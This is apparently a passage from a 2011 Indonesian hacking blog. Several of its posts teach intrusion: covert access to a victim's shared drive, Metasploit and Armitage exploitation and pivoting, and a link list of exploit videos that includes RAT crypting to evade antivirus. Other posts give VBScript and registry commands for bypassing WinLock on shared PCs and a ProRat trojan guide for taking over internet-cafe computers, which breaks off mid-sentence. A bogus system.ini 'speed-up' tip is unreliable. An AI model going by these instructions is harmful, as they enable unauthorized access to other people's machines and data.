/><br />segera tutup drive Z: agar ga ketahuan oleh korban<br />D:\>net use /delete Z:<br /><br />OK aman<br />Silahkan buka file “rahasia.doc” di folder “didit” menggunakan openoffice<br />Gampang kan..<br /><br />Nah seperti etika hacking yang ada pada umumnya<br />kita bukan hanya memberi cara menerobos tapi juga cara mengamankannya<br /><br />Yang pertama pakailah Linux hehehe<br />Jika terpaksa pakai windows maka:<br />download worm cleaner di http://www.softpedia.com/progDownload/Windows-Worms-Doors-Cleaner-Download-107294.html<br />lalu buka file tersebut maka otomatis akan menutup port 445<br />jika ingin membuka lagi port tersebut cukup klik tombol enabled<br /><br />Jangan lupa aktifkan firewall anda.<br /><br />Sekian dan terima kasih…<br /><br />Source: http://saifulanas<dotz>wordpress<dotz>com/2010/05/26/hacking-pake-metasploit/<br /><br /> <br />ARTIKEL KELIMA<br /><br />Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.<br /><br />Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.<br /><br />Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijyCuXPzUVaq4KDWoGOWS8wVjT2sgR13WxWE0O6ipEbFpSNOUOmrSSI7geq_LbQrocduJruYyoGwwrDqRIpAhCqSkyU6M5wysVYa8PKubFp1s_tRpRM0kx0sJqNKrtQJAL8frWNk2atzM/s1600/14.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijyCuXPzUVaq4KDWoGOWS8wVjT2sgR13WxWE0O6ipEbFpSNOUOmrSSI7geq_LbQrocduJruYyoGwwrDqRIpAhCqSkyU6M5wysVYa8PKubFp1s_tRpRM0kx0sJqNKrtQJAL8frWNk2atzM/s320/14.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5618888855922675618" /></a><br /><br />Armitage membantu dengan Remote Exploitation – menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.<br /><br />Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.<br /><br />Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Iwj2ANAz7MfWgV__4hTJN_1XWeZ9U6gzsv4xXuGj5l9_g0z2KQaq0pER-ON6_NtCgeonTsJosX7mjLlh7529mxRYKrt5YTwTDEizrNCvVbwAN6N1Y8j6HIVEpYNHHI8VhnAosLN8M8U/s1600/15.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 195px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Iwj2ANAz7MfWgV__4hTJN_1XWeZ9U6gzsv4xXuGj5l9_g0z2KQaq0pER-ON6_NtCgeonTsJosX7mjLlh7529mxRYKrt5YTwTDEizrNCvVbwAN6N1Y8j6HIVEpYNHHI8VhnAosLN8M8U/s320/15.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5618889252849375842" /></a><br /><br />Yang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.<br /><br />Untuk menggunakan Armitage, Anda memerlukan berikut ini:<br />* Linux atau Windows<br />* Java 1.6<br />* Metasploit Framework 3.5<br />* Database dikonfigurasi. Pastikan Anda tahu username, password, dan host.<br /><br /><br />Untuk Mendapatkan Armitage, Silahkan Download disini:<br />Windows – armitage112510.zip<br />Linux – armitage112510.tgz<br /><br />————————————————————————–<br />Refrensi:<br />- http://www.fastandeasyhacking.com/manual<br />- http://www.darknet.org.uk/2010/12/ar…or-metasploit/<br />- http://www.commonexploits.com/<br /><br /><br />Video Demonstration:<br /><br /><iframe width="560" height="349" src="http://www.youtube.com/embed/kdtMthVeC1M" frameborder="0" allowfullscreen></iframe><br /><br /><iframe width="560" height="349" src="http://www.youtube.com/embed/EACo2q3kgHY" frameborder="0" allowfullscreen></iframe><br /><br />sahabat salaz! moga sukses.......salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-82730954846344367202011-06-13T20:22:00.000-07:002011-06-13T20:28:39.380-07:00facebook hack guyonan dan ngatasineJika anda mengalami locking Account of Facebook or terkena serangan Facebook Freezer, tidak usah panik dan tidak usah terlalu takut akan kondisi account facebook anda. Tidak seperti Lock ID Yahoo Messenger, Lock ID Facebook atau Facebook Account Locker tidaklah kemudian membuat anda tidak bisa login ke facebook 12 jam atau 24 jam (seperti kasus di yahoo messenger yang accountnya terkena Lock ID). Di facebook cara freezing ini hanya akan membuat password anda tidak berlaku lagi dikarenakan oleh facebook freezer yang mencoba (sengaja salah lagi) berkali kali berusaha login ke account anda.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGMaJSa1oIAeZiyjMj71rJNgOCN5aHsl7F068jmNL2rApVnh-6YphQJ5cS-qpc06kS1Cc8-xFphsuG3ySJqr78LzL6F1WiArmPP_3KnLavST82t9dYyMOZOeoYOPMoUIhMQF4mEB51Pfc/s1600/facebookfreezer.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 299px; height: 303px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGMaJSa1oIAeZiyjMj71rJNgOCN5aHsl7F068jmNL2rApVnh-6YphQJ5cS-qpc06kS1Cc8-xFphsuG3ySJqr78LzL6F1WiArmPP_3KnLavST82t9dYyMOZOeoYOPMoUIhMQF4mEB51Pfc/s320/facebookfreezer.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5617911994042793186" /></a><br /><br />Karena facebook ada limit loginnya, maka dikarenakan hal tersebut facebook akan menganggap “situasi yang penting” untuk mematikan password anda supaya aktivitas “cracking password” tidak berhasil. Ya, adanya sistem kadaluwarsa ini sesungguhnya untuk melindungi account facebook anda, tetapi malah dimanfaatkan oleh facebook freezer untuk membuat anda tidak bisa login dengan password anda, persis seperti yahoo messenger lock id.<br /><br />Jika anda terkena Facebook Freezer<br /><br />Jika anda terkena facebook freezer, maka gak usah terlalu panik. Ikuti aja petunjuk facebook dengan mereset password facebook anda (akan dikirim reset links dan password resetnya ke email anda). Dan dengan beberapa kali step aja (gak sampai 5 menit) account facebook anda kembali anda dapatkan. :D<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQilxshyphenhyphenQchc2yHktzZb5nu7MqGM1QPYbZilQxfl4Fnv0iE32Y_tiFAIldRL9PSTZ7Mfr0SSwNY6Of16Ks56QobCZhW2BWIr6P_43H3QRrO1R6Qryk4EbwonZOSPtSbfP4BTgyAVaCzUM/s1600/facebookresetpassword.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 286px; height: 233px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQilxshyphenhyphenQchc2yHktzZb5nu7MqGM1QPYbZilQxfl4Fnv0iE32Y_tiFAIldRL9PSTZ7Mfr0SSwNY6Of16Ks56QobCZhW2BWIr6P_43H3QRrO1R6Qryk4EbwonZOSPtSbfP4BTgyAVaCzUM/s320/facebookresetpassword.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5617912112480393954" /></a><br />Cara menanggulangi / Pencegahan facebook freezer<br /><br />beberapa saran saya agar anda tidak terkena facebook freezer ini adalah dengan menyembunyikan alamat email login facebook anda (baik di facebook profile atau di lain tempat). Gunakan email lain yang anda persilahkan untuk dikirimi surel (email) di profile facebook anda yang berbeda dengan email login anda.salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-72471014782817583452011-06-13T20:10:00.000-07:002011-06-13T20:14:06.928-07:00kirim sms/mms gratis kesemua negarasms<br />klik <a href="http://smsfree4all.com/free-sms-all-countries.html">disini</a><br /><br /><br />mms<br />klik <a href="http://smsfree4all.com/free-mms-all-countries.html">disini</a><br /><br />pilih negara tujuan dan nikmati gratisannyasalazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-10564323249876598602011-06-13T19:58:00.000-07:002011-06-13T20:02:32.621-07:00Stop wasting lots of money to call Indonesia. Call Indonesia for FREE!<br />(indonesia,srilanka,india,pakistan and other is available)<br />(khusus untuk teman saya di ukrania,jerman,turki,amerika,sudan dan rusia)<br /><br />Stop using expensive calling cards to call international to Indonesia. Calling cards have connection fees, per minute rounding, and use it once or lose your value restrictions. Many calling cards also have the restriction on how many day after activation the balance expires. We here attempt to eliminate pain of waisting lots of money on calling cards and other prepaid international plans. Also, do not pay excuberant fees for Indonesia international direct dialing. Do not get ripped by hidden fees for international direct dialing to Indonesia.<br />FREE Calls to Indonesia (Land or Mobile Phones) Using Jaxtr<br /><br /> 1. Goto jaxtr.com site.<br /> 2. Get a local number using your number and receving partly number. Local number is local to both of you even though you can be from different countries.<br /> 3. You call that local number.<br /> 4. Receving party get a text message that you are trying to call them (or you can use FREE SMS to send the receiving part that you waiting for them to dial the local number you provided; Or you can use Evaphone (shown below) to make a quick free direct call and let them know you are waiting for them to connec to Jaxtr)<br /> 5. Receiving party dials their local number and connect both of you for unlimited mintues.<br /><br />FREE PC based Calls to Indonesia Phone (Land or Limited Mobile) Using FreeCalls<br /><br /> 1. Download FREECall program.<br /> 2. Install it. Then, go thru their free signup and get a free username and password.<br /> 3. Scan and test your microphone and speaker.<br /> 4. Login to freecall application.<br /> 5. Make direct call to any land number they support. They also have a limited countries with mobile supported.<br /><br />FREE Web Page Based Quick Direct Phone Calls to Indonesia using Evaphone<br /><br />Using Evaphone you can make quick calls to Indonesia. Find out how long you can call here. Evaphone has a limitation of two calls per day.<br />FREE Calls to Indonesia (Mobile and Land Phones) Using Talkster<br /><br />You and your friend needs to get local number. Getting FREE local Talkster numbers for you and your friends around the world is simple!<br /><br /> 1. The first time only, tell us the name and phone number of the friend you want to call<br /> 2. You are given a new Talkster phone number for each friend that is yours to use forever. Save it in the address book on your phone!<br /> 3. Whenever you want to talk to your friend, dial the new local Talkster number for that friend instead of the old long distance or international number.<br /><br />We would personally recommend if you have a computer with broadband connection and admin rights to install programs, install freecalls and dial number directly off the computer. Our second choice would be Jaxtr or Talkster.salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-80627716057335113322011-06-13T19:36:00.000-07:002011-06-13T19:50:10.559-07:00index hacking in wordl wide web<a href="http://l.elijah69.online.fr/Hack!%20StuFF/">pertama</a><br /><a href="http://www.supershareware.com/internet-haking-free/index/">kedua</a>salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-52087409575890606672011-06-13T19:30:00.000-07:002011-06-13T19:33:05.564-07:00index hacking tools 2Nih ada link, silahkan langsung di download ya, yang nggak mau nggak usah baca ini.<br /><br />1. DeluxeBB 1.06 Exploit (9mb)<br />Remote SQL Injection Exploit<br /><br />Code:<br /><br />http://rapidshare.com/files/11156227/100_live585.rar<br /><br /><br /><br />2. NetBios Live Hack (5mb)<br />Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)<br /><br />Code:<br /><br /><br /><br /><br />3. Classified (7mb)<br />Shows how site classified is Hacked.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158779/102_site585.rar<br /><br /><br /><br />4. NASA (2mb)<br />NASA Department website Hacked.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158865/92_meh.zip<br /><br /><br /><br />5. Linux Network Monitor (5mb)<br />This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158774...rk_Monitor.zip<br /><br /><br /><br />6. Linux DNS Server (11mb)<br />This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.<br /><br />Code:<br /><br /><br /><br />7. Windows Web Server (6mb)<br />This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158787...Web_Server.zip<br /><br /><br /><br />8. Win Server 2003 IIS and DNS (4mb)<br />This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158780...IS_and_DNS.zip<br /><br /><br /><br />9. Hacker Defender Movie (8mb)<br />Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158766<br /><br />/90_Brilliant_Hacker_defender_presentation_movie_MS V1.rar<br /><br /><br /><br />10. 0-DAY Simple SQL Injection (8mb)<br />A film project about a cracker with the name zer0day. (Hacking with Linux -php)<br /><br />Code:<br /><br />http://rapidshare.com/files/11158799...-injection.zip<br /><br /><br /><br />11. wbb (10mb)<br />wbb portal hacked by XSS.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158816/82_wbb_portal.rar<br /><br /><br /><br />12. Reverse Engineering (20mb)<br />Reverse Engineering with LD PRELOAD<br /><br />Code:<br /><br />http://rapidshare.com/files/11158857/83_reverse.rar<br /><br /><br /><br />13. SWF File Vulnerability<br />Multiple Websites Embedded SWF File Vulnerability Demonstration<br /><br />Code:<br /><br />http://rapidshare.com/files/11158813...F_Vul_Demo.rar<br /><br /><br /><br />14. IPB 1.3 SQL (10mb)<br />Invasion Power Board 1.3 SQL Injection Exploit<br /><br />Code:<br /><br />http://rapidshare.com/files/11158768/86_IPB_SQL.rar<br /><br /><br /><br />15. Qnix Buffer Overflows (11mb)<br />Qnix Demonstrating Exploration of Simple Buffer Overflows<br /><br />Code:<br /><br />http://rapidshare.com/files/11158770/87_buff.rar<br /><br /><br /><br />16. ASP SQL (5mb)<br />Simple ASP Administrator SQL Injection (5mb)<br /><br />Code:<br /><br />http://rapidshare.com/files/11158795/88_asp_sql.rar<br /><br /><br /><br />17. Blind MySQL (9mb)<br />Demonstration of Blind MySQL Injection (bsqlbf)<br /><br />Code:<br /><br />http://rapidshare.com/files/11158804/77_Blind_MySQL.rar<br /><br /><br /><br />18. D-Link Wireless (3mb)<br />Intruders D-Link Wireless Access Point Configuration Disclosure<br /><br />Code:<br /><br />http://rapidshare.com/files/11158777...k_Wireless.rar<br /><br /><br /><br />19. Mysql bftools (8mb)<br />Demonstration of Blind MySQL Injection (mysql_bftools)<br /><br />Code:<br /><br />http://rapidshare.com/files/11158798...ql_bftools.rar<br /><br /><br /><br />20. PHP Remote File (9mb)<br />PHP Remote File Inclusion Windows Backdoor.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158805/80_PHP_Remote.rar<br /><br /><br /><br />21. Cracking WEP in 10 Minutes (30mb)<br />A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this<br /><br />Code:<br /><br />http://rapidshare.com/files/11158904...c-wepcrack.zip<br /><br /><br /><br />22. Tunneling Exploits via SSH (18mb)<br />An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158855...-tunneling.zip<br /><br /><br /><br />23. A classic client side attack (18mb)<br />The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158860...lient-side.rar<br /><br /><br /><br />24. C++ Video tutorials (29mb)<br />Nice C/C++ Shockwave videos.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158892/70_C__.rar<br /><br /><br /><br />25. Interview with Kevin Mitnick (12mb)<br />He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158829/68_kevin.rar<br /><br /><br /><br />26. Unix Shell Fundamentals (40mb)<br />VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.<br /><br />Code:<br /><br />http://rapidshare.com/files/11158906...xShellFund.rar<br /><br /><br /><br />27. Microsoft.com Bugs<br />Nice videos shows of old bug that was exploited on the site.<br /><br />Code:<br /><br /><br /><br /><br />28. Bitfrost Server Crypting (15mb)<br />This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.<br /><br />Code:<br /><br />http://rapidshare.com/files/11164849...erver_Cryp.rar<br /><br /><br /><br />29. WMF File Code Execution Vulnerability With Metasploit (38mb)<br />This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help.<br /><br />Code:<br /><br /><br /><br /><br />30. SSH Dynamic Port Forwarding (30mb)<br />I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH's dynamic port forwarding (sort of a poor man's VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients.<br /><br />Code:<br /><br /><br /><br />31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb)<br />In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO<br /><br />Code:<br /><br />http://rapidshare.com/files/11164810...ayerlivecd.swf<br /><br /><br /><br />32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb)<br /><br />Code:<br /><br /><br /><br /><br />33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb)<br /><br />Code:<br /><br />http://rapidshare.com/files/11164773/54_vmxbuilder.swf<br /><br /><br /><br />34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb)<br /><br />Code:<br /><br /><br /><br />35. Droop's Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb)<br /><br />Code:<br /><br /><br /><br /><br />36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb)<br /><br />Code:<br /><br />http://rapidshare.com/files/11164827/45_wigle1.swf<br /><br /><br /><br />37. Finding Rogue SMB File Shares On Your Network (60mb)<br /><br />Code:<br /><br /><br /><br />38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb)<br />This video covers some intermediate and advanced Nmap options and is a follow-up to "Basic Nmap Usage" presentation.<br /><br />Code:<br /><br /><br /><br />38. Metasploit Flash Tutorial<br />This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.<br /><br />Code:<br /><br />http://rapidshare.com/files/11164788/48_metasploit1.swf<br /><br /><br /><br />39. Using VirtualDub and a cheap webcam as a camcorder (10mb)<br />I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.<br /><br />Code:<br /><br />http://rapidshare.com/files/11164832...pcamcorder.avisalazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-77573867689464104972011-06-13T19:28:00.000-07:002011-06-13T19:30:52.083-07:00Trik Cara Mempercepat Konaksi,eh.....koneksi!Penggunaan internet saat ini memang sudah dapat dinikmati oleh banyak orang namun pada daerah-daerah tertentu akses internet seringkali dirasakan sangat lambat apalagi untuk daerah yang belum menggunakan akses internet broadband yang berbasis teknologi Asymetric Digital Subscriber Line (ADSL), yang dapat memberikan paket layanan dari modem sampai BRAS (Broadband Remote Access Server)yang banyak disediakan oleh provider internet.<br /><br />A. Menggubah setting bandwith Pada windows<br />Secara default OS windows membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth, anda dapat memaksimalkan jatah bandwith untuk PC atau laptop yang anda gunakan agar akses internet anda dapat maksimal dengan tips sederhana ini :<br />1. Klik Tombol Start pada windows<br />2. Klik Run dan Ketik gpedit.msc dan klik OK<br />3. Pilih Administrative Templates dan Klik Network<br />4. Setelah terbuka klik QoS Packet scheduler<br />5. Pilih Limit Reservable Bandwidth dan ubah setting menjadi Enable<br />6. Ubah Bandwidth Limitnya menjadi 0 Klik Apply > OK<br />7. keluar dan Restart komputer<br /><br />B. Setting DNS menggunakan OpenDNS.<br />1. Buka Control Panel<br />2. Pilih icon Network Connection<br />3. Klik Kanan Local Area Connection pilih Properties atau Wireless Network Connection jika anda menggunakan wireless untuk koneksi<br />4. Pilih Internet Protocol (TCP/IP) kemudian Klik Properties<br />5. Klik Use Following DNS Server<br />6. Isi Preferred DNS Server dengan angka : 208.67.222.222<br />7. Isi Alternate DNS Server dengan angka : 208.67.220.220<br />8. Kemudian Klik OK<br /><br />C. Mengatur Buffer pada windows :<br />1. Klik tombol Start dan pilih Menu “Run”<br />2. Ketik “system.ini”<br />3. Setelah Terbuka tambahkan dibawah baris terakhir<br />page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps<br />5. Hasilnya akan tampak seperti berikut ini.<br />; for 16-bit app support<br />[drivers]<br />wave=mmdrv.dll<br />timer=timer.drv<br />[mci]<br />[driver32]<br />[386enh]<br />woafont=dosapp.FON<br />EGA80WOA.FON=EGA80WOA.FON<br />EGA40WOA.FON=EGA40WOA.FON<br />CGA80WOA.FON=CGA80WOA.FON<br />CGA40WOA.FON=CGA40WOA.FON<br />page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps<br />6. Save dan exit lalu resstart komputer kamu.salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-17685783464337345622011-06-13T19:27:00.000-07:002011-06-13T19:28:21.905-07:00bye bye winlock.......,Okey, Pasti semua udah tau winlock itu apa kan ? Kalo belum tau search aja di google yah, hihihihi. Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut. Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut. Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut.<br /><br />OK. Yang dibutuhin cuma<br /><br />1. Notepad / Wordpad.<br /> Ok langsung aj ya, udah dibuka notepad/wordpad? Usahakan cek dulu ada deepfreeze atau kagak. Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer. Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.<br /><br />Copy script ini:<br /><br />strComputer = “.”<br />Set objWMIService = GetObject(”winmgmts:” _<br />& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)<br />Set colProcessList = objWMIService.ExecQuery _<br />(”Select * from Win32_Process Where Name = ‘winlock.exe’”)<br />For Each objProcess in colProcessList<br />objProcess.Terminate()<br /><br />Next<br /><br />Const HKEY_CLASSES_ROOT = &H80000000<br /><br />strComputer = “.”<br /><br />Set objRegistry=GetObject(”winmgmts:\\” & _<br />strComputer & “\root\default:StdRegProv”)<br /><br />strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”<br />strValueName = “ID”<br /><br />objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName<br /><br />Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya. Sebenarnya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.<br /><br />Keterangan:<br /><br />* Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?<br />* Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID<br /><br />Sekarang step 2. (AKTIFKAN TASK MANAGER)<br /><br />Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt). Kalo taskmanager / startnya gak didisable, bisa langsung aja buka command prompt di accesories. Dan coba saja windows+R, kalau bisa, ya langsung aja copy script aktifkan command promptnya dibawah.<br /><br />/// Program Ramping Mengamankan Task Manager<br />// Nama Program: tsk_mgr.js<br />function prakata(pesan)<br />{<br />natan.popup(pesan,0,”Menjaga Task Manager”);<br />}<br />function catat(harga)<br />{<br />natan.RegWrite(”HKCU\\Software\\micr*soft\\Windows \\CurrentVersion”+<br />“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DW ORD”);<br />}<br />var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;<br />natan = WScript.CreateObject(”WScript.Shell”);<br />pesan = “Menu Pilihan :\n\n”+<br />“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+<br />“Klik [No] untuk Aktifkan Task Manager.\n”+<br />“Klik [Cancel] untuk Keluar.\n\n”+<br />“[+] http:www.netrix.web.id [+]\n\n”+<br />“NonAktifkan Task Manager sekarang?”;<br />tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);<br />if (tanya == vbYes)<br />{<br />harga=1;<br />pesan=”Task Manager DiNonAktifkan! visit http://www.www.netrix.web.id/”;<br />catat(harga);<br />prakata(pesan);<br />}<br />else if (tanya == vbNo)<br />{<br />harga=0;<br />pesan=”Task Manager DiAktifkan! visit http://www.www.netrix.web.id/”;<br />catat(harga);<br />prakata(pesan);<br />}<br />else<br />{<br />pesan=”visit http://www.www.netrix.web.id/”;<br />prakata(pesan);<br />}<br /><br />Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager. Lalu buka task manager (ctrl+alt+del) >> Pilih tab users >> Klik menu File >> Pilih Run >> Lalu copy paste script ini di situ.<br /><br />REG add HKCU\Software\Policies\micr*soft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f<br /><br />Ini fungsinya buat mengaktifkan command prompt. Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt. Setelah masuk command prompt, Silahkan cari dimana folder winlock berada. Misalkan berada di folder C:\program files\winlockpro<br /><br />* Ketik C: lalu enter Ketik cd program files lalu enter<br />* Ketik cd winlockpro lalu enter<br />* Dan ketik winlock.exe lalu enter<br /><br />TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu. Sekarang Anda bebas mau ngapain aja. Mau Download/Colok USB/dll pokoknya bisa deh, kan udah jadi admin.salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-65052337439749176492011-06-13T19:18:00.000-07:002011-06-13T19:26:57.644-07:00Meremote Komputer Orang Via ProRatMeremote komputer<br />Meremote komputer disini maksudnya adalah mengendalikan komputer jarak jauh dengan komputer yang berbeda.<br />Jadi kita bisa melakukan aktivitas untuk menggunakan mouse dan keyboard dengan lokasi komputer yang berbeda.<br />Misalnya Anda ingin mengendalikan computer kantor dari komputer/laptop di rumah hanya dengan koneksi internet,<br />klo saya coba di komputer warnet, hehe…..<br /><br />yang dibutuhkan, hanyalah :<br />1. <a href="http://www.4shared.com/file/NItya4V4/Advanced_Ports_Scanner_v13.htm">tool Advanced Ports Scanner</a><br />tool ini hanya dibutuhkan untuk mengetahui alamat IP dan Port sang korban<br /><br />2. tool Prorat<br />aplikasi inilah yang bisa digunakan untuk meremote komputer orang lain. kunjungi disitus resminya<br />http://www.prorat.net untuk tool ini bisa anda download langsung klik disini<br />password rar : “pro”<br /><br />Oke langsung aja!<br /><br />Cara penggunaan ProRat :<br />1. Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka.<br />Kita dapat melakukannya dengan cara manual atau juga dengan bantuan tool Ports Scanner.<br />Terbitkan Entri<br /><br />Dari gambar diatas kita mengetahui semua IP komputer warnet yang aktif dan Port mana saja 